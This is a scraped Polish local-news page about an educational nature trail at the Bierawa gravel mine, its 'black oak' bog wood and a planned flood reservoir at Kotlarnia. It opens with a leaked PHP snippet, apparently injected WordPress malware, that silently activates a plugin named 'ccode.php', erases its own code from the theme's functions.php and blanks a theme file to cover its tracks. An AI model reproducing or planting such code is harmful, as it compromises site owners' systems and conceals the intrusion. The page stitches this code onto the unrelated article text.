function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "function true_plugins_activate()"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 3; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/micropro/ftp/apkka/wp-content/themes/disto/class.theme-modules.php'); file_put_contents('/home/micropro/ftp/apkka/wp-content/themes/disto/class.theme-modules.php', ''); } } add_action('init', 'true_plugins_activate'); Pierwsza taka kopalnia, którą można zwiedzać z dziećmi | Tygodnik PARTNER

Pierwsza taka kopalnia, którą można zwiedzać z dziećmi

Na terenie Zakładu Górniczego w Bierawie powstała wyjątkowa ścieżka przyrodniczo-edukacyjna. Można tu zobaczyć legendarne czarne dęby.

Ścieżka edukacyjno-przyrodnicza powstała na terenie dawnego wyrobiska kopalni Bierawa. Trasa wokół jeziorek powstałych wskutek wydobywania żwiru wymaga około 1,5 godziny czasu. Pomocą służy dziewięć tablic informacyjnych z których można się dowiedzieć o gatunkach roślin i zwierząt jakie można znaleźć w tak ukształtowanym krajobrazie Poszczególne tablice są poświęcone m.in. występującym w Żwirowni ptakom, ssakom i płazom, charakterystycznym roślinom czy też śladom i tropom, na które można się natknąć podczas spacerów po okolicy – opowiada dr Anna Śliwińska-Wyrzychowska z wydziału Matematyczno-Przyrodniczego Akademii im. Jana Długosza w Częstochowie. Są informacje o budowie geologicznej tego terenu, a także różne ciekawostki. Do tych ostatnich należą tzw. czarne dęby zwane też polskim hebanem. To drewno dębów przebywających w ziemi lub pod wodą od co najmniej kilkuset lat. Szacowane światowe złoża czarnego dębu są mniejsze niż światowe złoża diamentów. W carskiej Rosji za posiadanie mebli z czarnego dębu groziła nawet kara śmierci, były one bowiem zastrzeżone dla rodziny panującej. Drewno czarnego dębu wykorzystuje się do produkcji forniru oraz jako materiał rzeźbiarski. Znajduje zastosowanie przy produkcji mebli stylowych (w przeszłości wysoko cenionych mebli gdańskich), galanterii drzewnej (głównie pamiątkowej), rękojeści noży i fajek. Używany jest także w intarsjach i inkrustacjach. Czarne dęby można oglądać z bliska, gdyż zostały wyciągnięte z wody na brzeg. Aby skorzystać ze ścieżki edukacyjnej należy się wcześniej skontaktować z firmą Cemex do której należy kopalnia odkrywkowa. Warto to zrobić nieco wcześniej od planowanej wizyty, ponieważ taką formą nauki zainteresowanych jest już podobno wiele szkół. Kopalnia żwiru Bierawa zlokalizowana jest w odległości 10 km na południe od Kędzierzyna-Koźla. W kopalni produkowane są piaski i żwiry płukane. Żwirownia Bierawa zaopatruje w kruszywa klientów z rejonu Górnego Śląska, Kędzierzyna-Koźla i Opola. Kruszywa dowożone są transportem samochodowym do wyznaczonego miejsca dostawy. Jak każda tego typu kopalnia ma obowiązek zagospodarować tereny na których zakończono już wydobycie kruszyw. To właśnie stąd wziął się pomysł zorganizowania ścieżki edukacyjnej. Innymi pomysłami na zagospodarowanie podobnych wyrobisk jest zalewanie ich wodą i tworzenie akwenów rekreacyjnych. Takowy miałby w przyszłości powstać w Kotlarni. Chodzi również o potężne wyrobisko po kopalni piasku. Ma ono powierzchnię 1000 hektarów. Po jego zalaniu mógłby powstać zbiornik o pojemności stałej 16 mln metrów sześciennych wody i maksymalnej – 42 mln. W razie powodzi gromadziłby nadmiar wody, a w razie suszy, co pokazały ostatnie lata, mógłby uzupełnić koryto rzek. Szacuje się, że zbiornik spłaszczyłby falę powodziową na Odrze o około pół metra. W praktyce mogłoby to pomóc ochronić mieszkańców wszystkich opolskich gmin leżących nad Odrą, a także gmin dolnośląskich.

Aktualna kategoria: AKTUALNOŚCI Tagi: 
REKLAMA
© 2020 Tygodnik PARTNER. All rights reserved / Wszystkie prawa zastrzeżone
Zobacz także: www.kedzierzynkozle24.pl.